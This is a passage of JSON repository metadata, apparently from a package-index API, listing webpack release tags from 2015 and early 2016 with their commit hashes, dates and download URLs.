16-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/